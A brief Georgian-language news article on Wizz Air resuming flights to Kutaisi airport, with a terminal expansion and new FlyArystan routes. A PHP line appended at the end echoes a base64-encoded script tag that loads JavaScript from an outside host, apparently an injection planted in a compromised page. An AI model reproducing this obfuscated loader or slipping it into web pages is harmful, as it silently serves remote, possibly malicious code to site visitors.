celsiusi
ავერსი საქკაბელი

Wizz Air-მა საქართველოში რეგულარული ფრენები მრავალთვიანი პაუზის შემდგომ განაახლა. ქუთაისის აეროპორტში ავიაკომპანიის პირველი ფრენა გვიან ღამით შესრულდა. პირველი ფრენა ვილნიუს-ქუთაისის მიმართულებით შესრულდა. ასევე განახლდება ფრენები ვარშავა-ქუთაისის მიმართულებითაც. 

 
პანდემიის პერიოდში განახლდა თავად ქუთაისის საერთაშორისო აეროპორტიც. მისი ტერმინალი ოთხჯერ უფრო გაფართოვდა, რაც ჯამში დაახლოებით 30 ათასი კვადრატული მეტრის ერთიან სივრცეს ქმნის.
 
"მაისიდან აეროპორტში "ვიზეარი" რიგისა და დორტმუნდის მიმართულებით ამატებს რეისებს. ასევე, 2 მაისიდან აეროპორტში ოპერირებას დაიწყებს ახალი, ყაზახური დაბალბიუჯეტიანი ავიაკომპანია FlyArystan-ი, რომელიც პირდაპირ რეგულარულ რეისებს სამი მიმართულებით განახორციელებს. ახალი სერვისები და სხვა სიახლეები ოპერირების განახლების პარალელურად აეროპორტში ეტაპობრივად დაინერგება", - ნათქვამია აეროპორტების გაერთიანების განცხადებაში.
 
შეგახსენებთ: უნგრული ავიაკომპანიის მიერ ფრენების დაწყებას ჯერ კიდევ მარტის ბოლოდან აანონსებდა ეკონომიკისა და მდგრადი განვითარების მინისტრი ნათია თურნავა. როგორც ის 4 მარტს აცხადებდა, „ვიზეარი“ 45 ფრენას 20 მიმართულებით შეასრულებდა, თუმცა ეს ინფორმაცია იმავე დღეს თავად ავიაკომპანიამ უარყო. მარტში კომპანიის კორპორაციული კომუნიკაციების მენეჯერმა ანდრაშ რადომ bm.ge-ს უთხრა, რომ ქუთაისიდან “ფრენების აღდგენის კონკრეტულ თარიღზე საუბარი ნაადრევი იყო”.
2262
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");